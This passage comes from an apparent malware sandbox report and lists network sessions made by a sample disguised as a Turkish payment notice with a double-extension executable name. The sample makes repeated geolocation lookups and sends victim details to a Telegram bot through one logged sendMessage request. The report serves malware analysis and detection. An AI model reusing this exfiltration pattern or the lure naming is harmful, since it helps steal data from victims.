                                                            Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
                                                            2024-10-03 07:16:29 UTC5INData Raw: 30 0d 0a 0d 0a
                                                            Data Ascii: 0


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            2192.168.2.749710188.114.96.34437220C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exe
                                                            TimestampBytes transferredDirectionData
                                                            2024-10-03 07:16:30 UTC84OUTGET /xml/8.46.123.33 HTTP/1.1
                                                            Host: reallyfreegeoip.org
                                                            Connection: Keep-Alive
                                                            2024-10-03 07:16:30 UTC710INHTTP/1.1 200 OK
                                                            Date: Thu, 03 Oct 2024 07:16:30 GMT
                                                            Content-Type: application/xml
                                                            Transfer-Encoding: chunked
                                                            Connection: close
                                                            access-control-allow-origin: *
                                                            vary: Accept-Encoding
                                                            Cache-Control: max-age=86400
                                                            CF-Cache-Status: HIT
                                                            Age: 63584
                                                            Last-Modified: Wed, 02 Oct 2024 13:36:46 GMT
                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=KZgVOJ5Q7whO9izFeNYqbNhZUbIfmjM%2FCuP5DC8nwVeJUnBfu1gOe%2F2%2B58acsBtDH1g%2BVInD%2FUqu41YSlCGBHYdFQo7bvFKcjUiVRD8zC6RIoeEsnGzafpsfo6Iim3DBRBXqfrbc"}],"group":"cf-nel","max_age":604800}
                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                            Server: cloudflare
                                                            CF-RAY: 8ccb25a9d96b18d0-EWR
                                                            alt-svc: h3=":443"; ma=86400
                                                            2024-10-03 07:16:30 UTC340INData Raw: 31 34 64 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e 37 35
                                                            Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
                                                            2024-10-03 07:16:30 UTC5INData Raw: 30 0d 0a 0d 0a
                                                            Data Ascii: 0


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            3192.168.2.749712188.114.96.34437220C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exe
                                                            TimestampBytes transferredDirectionData
                                                            2024-10-03 07:16:31 UTC84OUTGET /xml/8.46.123.33 HTTP/1.1
                                                            Host: reallyfreegeoip.org
                                                            Connection: Keep-Alive
                                                            2024-10-03 07:16:31 UTC672INHTTP/1.1 200 OK
                                                            Date: Thu, 03 Oct 2024 07:16:31 GMT
                                                            Content-Type: application/xml
                                                            Transfer-Encoding: chunked
                                                            Connection: close
                                                            access-control-allow-origin: *
                                                            vary: Accept-Encoding
                                                            Cache-Control: max-age=86400
                                                            CF-Cache-Status: HIT
                                                            Age: 63585
                                                            Last-Modified: Wed, 02 Oct 2024 13:36:46 GMT
                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=DEPeXZRcUxY8JjIPXgMdkd9RD3Zv1XApcpvV9Ha6HQHspUGr6wjVG11YFb6JARzRlZ6t6az9miTQM8lYo7M7vb9w4xqY8YdOiNFfBlkqkGZUX8rln29yCz5M6Ja46%2BW2iTWFskkM"}],"group":"cf-nel","max_age":604800}
                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                            Server: cloudflare
                                                            CF-RAY: 8ccb25b13bcf421f-EWR
                                                            2024-10-03 07:16:31 UTC340INData Raw: 31 34 64 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e 37 35
                                                            Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
                                                            2024-10-03 07:16:31 UTC5INData Raw: 30 0d 0a 0d 0a
                                                            Data Ascii: 0


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            4192.168.2.749714188.114.96.34437220C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exe
                                                            TimestampBytes transferredDirectionData
                                                            2024-10-03 07:16:32 UTC84OUTGET /xml/8.46.123.33 HTTP/1.1
                                                            Host: reallyfreegeoip.org
                                                            Connection: Keep-Alive
                                                            2024-10-03 07:16:32 UTC688INHTTP/1.1 200 OK
                                                            Date: Thu, 03 Oct 2024 07:16:32 GMT
                                                            Content-Type: application/xml
                                                            Transfer-Encoding: chunked
                                                            Connection: close
                                                            access-control-allow-origin: *
                                                            vary: Accept-Encoding
                                                            Cache-Control: max-age=86400
                                                            CF-Cache-Status: HIT
                                                            Age: 63586
                                                            Last-Modified: Wed, 02 Oct 2024 13:36:46 GMT
                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=XB6b7YqGsf%2B%2BAtqcwbltiXT6lDlbkVtNmrybBBZMpEqkvVIr9Fq3cbQKD9Usn23mCuGgPg8i%2Bn%2BRHy9W%2B4CWKqtw%2BeRSAyXAx%2BEl%2BxK3oIP%2BINiyzlLROKvtPBnCfIpOzjb5Tymx"}],"group":"cf-nel","max_age":604800}
                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                            Server: cloudflare
                                                            CF-RAY: 8ccb25b81e917ca6-EWR
                                                            2024-10-03 07:16:32 UTC340INData Raw: 31 34 64 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e 37 35
                                                            Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
                                                            2024-10-03 07:16:32 UTC5INData Raw: 30 0d 0a 0d 0a
                                                            Data Ascii: 0


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            5192.168.2.749716188.114.96.34437220C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exe
                                                            TimestampBytes transferredDirectionData
                                                            2024-10-03 07:16:33 UTC60OUTGET /xml/8.46.123.33 HTTP/1.1
                                                            Host: reallyfreegeoip.org
                                                            2024-10-03 07:16:34 UTC682INHTTP/1.1 200 OK
                                                            Date: Thu, 03 Oct 2024 07:16:33 GMT
                                                            Content-Type: application/xml
                                                            Transfer-Encoding: chunked
                                                            Connection: close
                                                            access-control-allow-origin: *
                                                            vary: Accept-Encoding
                                                            Cache-Control: max-age=86400
                                                            CF-Cache-Status: HIT
                                                            Age: 63587
                                                            Last-Modified: Wed, 02 Oct 2024 13:36:46 GMT
                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=VMRkeVRvA2FXUPXq%2Bv3dnYFZUhUcEycvYQ24eV47yK2uKycX7KAaj9%2BQ%2Bb7cp9lZEA%2FRBQxvGeD4Un9XU6RV4mAmUUhCmaznWmjZCtuCvQn099O%2BzCP%2FsSNHpUkXsQQuchxCxtuj"}],"group":"cf-nel","max_age":604800}
                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                            Server: cloudflare
                                                            CF-RAY: 8ccb25c03cce4345-EWR
                                                            2024-10-03 07:16:34 UTC340INData Raw: 31 34 64 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e 37 35
                                                            Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
                                                            2024-10-03 07:16:34 UTC5INData Raw: 30 0d 0a 0d 0a
                                                            Data Ascii: 0


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            6192.168.2.749719188.114.96.34437220C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exe
                                                            TimestampBytes transferredDirectionData
                                                            2024-10-03 07:16:35 UTC60OUTGET /xml/8.46.123.33 HTTP/1.1
                                                            Host: reallyfreegeoip.org
                                                            2024-10-03 07:16:35 UTC686INHTTP/1.1 200 OK
                                                            Date: Thu, 03 Oct 2024 07:16:35 GMT
                                                            Content-Type: application/xml
                                                            Transfer-Encoding: chunked
                                                            Connection: close
                                                            access-control-allow-origin: *
                                                            vary: Accept-Encoding
                                                            Cache-Control: max-age=86400
                                                            CF-Cache-Status: HIT
                                                            Age: 63589
                                                            Last-Modified: Wed, 02 Oct 2024 13:36:46 GMT
                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=t1S0eTEslMw6fL16pUIRYRqG%2ByqkbqaPQ6w4PHAuA890V95wb77CRzgUsO%2BKaIRldHS%2BeQbi%2FPDGsm4vaMoV%2FB4FuODM5QEGP%2B2USUYWJVh%2FPwz9sFvlgSxI%2FjrqxX4cGqzzY8LI"}],"group":"cf-nel","max_age":604800}
                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                            Server: cloudflare
                                                            CF-RAY: 8ccb25caf85a42d5-EWR
                                                            2024-10-03 07:16:35 UTC340INData Raw: 31 34 64 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e 37 35
                                                            Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
                                                            2024-10-03 07:16:35 UTC5INData Raw: 30 0d 0a 0d 0a
                                                            Data Ascii: 0


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            7192.168.2.749725188.114.96.34437220C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exe
                                                            TimestampBytes transferredDirectionData
                                                            2024-10-03 07:16:38 UTC84OUTGET /xml/8.46.123.33 HTTP/1.1
                                                            Host: reallyfreegeoip.org
                                                            Connection: Keep-Alive
                                                            2024-10-03 07:16:38 UTC684INHTTP/1.1 200 OK
                                                            Date: Thu, 03 Oct 2024 07:16:38 GMT
                                                            Content-Type: application/xml
                                                            Transfer-Encoding: chunked
                                                            Connection: close
                                                            access-control-allow-origin: *
                                                            vary: Accept-Encoding
                                                            Cache-Control: max-age=86400
                                                            CF-Cache-Status: HIT
                                                            Age: 63592
                                                            Last-Modified: Wed, 02 Oct 2024 13:36:46 GMT
                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=5l%2FFckR4M%2BzmitcUS5FOJH5twbD7S6P9Xe4zRnbj2TbQsyae4gTxG6mR3P0Ex98roFzFqjHqTPWtv1Us%2FZHN9%2BdHbRzPzFx6RkOMfSp1zFQurxTn%2FrR%2FPzi5sU2RoNeISQux%2FfDW"}],"group":"cf-nel","max_age":604800}
                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                            Server: cloudflare
                                                            CF-RAY: 8ccb25da6ddf7d0c-EWR
                                                            2024-10-03 07:16:38 UTC340INData Raw: 31 34 64 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e 37 35
                                                            Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
                                                            2024-10-03 07:16:38 UTC5INData Raw: 30 0d 0a 0d 0a
                                                            Data Ascii: 0


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            8192.168.2.749727188.114.96.34437664C:\Users\user\AppData\Roaming\SOFcFE.exe
                                                            TimestampBytes transferredDirectionData
                                                            2024-10-03 07:16:40 UTC84OUTGET /xml/8.46.123.33 HTTP/1.1
                                                            Host: reallyfreegeoip.org
                                                            Connection: Keep-Alive
                                                            2024-10-03 07:16:40 UTC674INHTTP/1.1 200 OK
                                                            Date: Thu, 03 Oct 2024 07:16:40 GMT
                                                            Content-Type: application/xml
                                                            Transfer-Encoding: chunked
                                                            Connection: close
                                                            access-control-allow-origin: *
                                                            vary: Accept-Encoding
                                                            Cache-Control: max-age=86400
                                                            CF-Cache-Status: HIT
                                                            Age: 63594
                                                            Last-Modified: Wed, 02 Oct 2024 13:36:46 GMT
                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=1cF1MbLL6s%2FLJRjtaWFYRBOihLNYtBUZa%2BtKxZH4r0rDZduZOHLHTxcfDuUpLuFhkpv04PVObMlddMlwMnIHZqcyyL49nhcaFB8DysjYhMLrewjbNm8y24ChsU3yjn1fJ5MzIeq5"}],"group":"cf-nel","max_age":604800}
                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                            Server: cloudflare
                                                            CF-RAY: 8ccb25eb08221815-EWR
                                                            2024-10-03 07:16:40 UTC340INData Raw: 31 34 64 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e 37 35
                                                            Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
                                                            2024-10-03 07:16:40 UTC5INData Raw: 30 0d 0a 0d 0a
                                                            Data Ascii: 0


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            9192.168.2.749728188.114.96.34437220C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exe
                                                            TimestampBytes transferredDirectionData
                                                            2024-10-03 07:16:41 UTC60OUTGET /xml/8.46.123.33 HTTP/1.1
                                                            Host: reallyfreegeoip.org
                                                            2024-10-03 07:16:41 UTC676INHTTP/1.1 200 OK
                                                            Date: Thu, 03 Oct 2024 07:16:41 GMT
                                                            Content-Type: application/xml
                                                            Transfer-Encoding: chunked
                                                            Connection: close
                                                            access-control-allow-origin: *
                                                            vary: Accept-Encoding
                                                            Cache-Control: max-age=86400
                                                            CF-Cache-Status: HIT
                                                            Age: 63595
                                                            Last-Modified: Wed, 02 Oct 2024 13:36:46 GMT
                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=y%2FJYiYyrkejkFeMnFWWfC4UYyX806njwyxwXOIdA3YDKEE39WzrPY0i%2F5T3mRM6rja9wOLHjkbR0LqSoXuY36lAKuRo6Z7AuAjALUMfd9c56V%2B54z35LLoFVKdjbhlicSKkiifD9"}],"group":"cf-nel","max_age":604800}
                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                            Server: cloudflare
                                                            CF-RAY: 8ccb25ed0c15c32e-EWR
                                                            2024-10-03 07:16:41 UTC340INData Raw: 31 34 64 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e 37 35
                                                            Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
                                                            2024-10-03 07:16:41 UTC5INData Raw: 30 0d 0a 0d 0a
                                                            Data Ascii: 0


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            10192.168.2.749729149.154.167.2204437220C:\Users\user\Desktop\GeriOdemeBildirimi942.rar.xlxs.pdf.exe
                                                            TimestampBytes transferredDirectionData
                                                            2024-10-03 07:16:41 UTC349OUTGET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:724471%0D%0ADate%20and%20Time:%2003/10/2024%20/%2015:39:59%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20724471%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1
                                                            Host: api.telegram.org
                                                            Connection: Keep-Alive
                                                            2024-10-03 07:16:42 UTC344INHTTP/1.1 404 Not Found
                                                            Server: nginx/1.18.0
                                                            Date: Thu, 03 Oct 2024 07:16:42 GMT
                                                            Content-Type: application/json
                                                            Content-Length: 55
                                                            Connection: close
                                                            Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                            Access-Control-Allow-Origin: *
                                                            Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                            2024-10-03 07:16:42 UTC55INData Raw: 7b 22 6f 6b 22 3a 66 61 6c 73 65 2c 22 65 72 72 6f 72 5f 63 6f 64 65 22 3a 34 30 34 2c 22 64 65 73 63 72 69 70 74 69 6f 6e 22 3a 22 4e 6f 74 20 46 6f 75 6e 64 22 7d
                                                            Data Ascii: {"ok":false,"error_code":404,"description":"Not Found"}


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            11192.168.2.749730188.114.96.34437664C:\Users\user\AppData\Roaming\SOFcFE.exe
                                                            TimestampBytes transferredDirectionData
                                                            2024-10-03 07:16:43 UTC60OUTGET /xml/8.46.123.33 HTTP/1.1
                                                            Host: reallyfreegeoip.org
                                                            2024-10-03 07:16:43 UTC702INHTTP/1.1 200 OK
                                                            Date: Thu, 03 Oct 2024 07:16:43 GMT
                                                            Content-Type: application/xml
                                                            Transfer-Encoding: chunked
                                                            Connection: close
                                                            access-control-allow-origin: *
                                                            vary: Accept-Encoding
                                                            Cache-Control: max-age=86400
                                                            CF-Cache-Status: HIT
                                                            Age: 63597
                                                            Last-Modified: Wed, 02 Oct 2024 13:36:46 GMT
                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=QgLx9dmzmS1pLyk%2B2GI9Me89R2d7rQx2J0T86FUpC3rfmQ7pKeyQN1172UZUnfsIDCNHHXa533qmwiY616P4B0HprRpYumyVwnJhctXwndUuMIbIR8izwzFlkgwmzuF46TzYUdTg"}],"group":"cf-nel","max_age":604800}
                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                            Server: cloudflare
                                                            CF-RAY: 8ccb25fc3ae61881-EWR
                                                            alt-svc: h3=":443"; ma=86400
                                                            2024-10-03 07:16:43 UTC340INData Raw: 31 34 64 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e 37 35
                                                            Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
                                                            2024-10-03 07:16:43 UTC5INData Raw: 30 0d 0a 0d 0a
                                                            Data Ascii: 0


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            12192.168.2.749732188.114.96.34437664C:\Users\user\AppData\Roaming\SOFcFE.exe
                                                            TimestampBytes transferredDirectionData
                                                            2024-10-03 07:16:45 UTC60OUTGET /xml/8.46.123.33 HTTP/1.1
                                                            Host: reallyfreegeoip.org
                                                            2024-10-03 07:16:45 UTC710INHTTP/1.1 200 OK
                                                            Date: Thu, 03 Oct 2024 07:16:45 GMT
                                                            Content-Type: application/xml
                                                            Transfer-Encoding: chunked
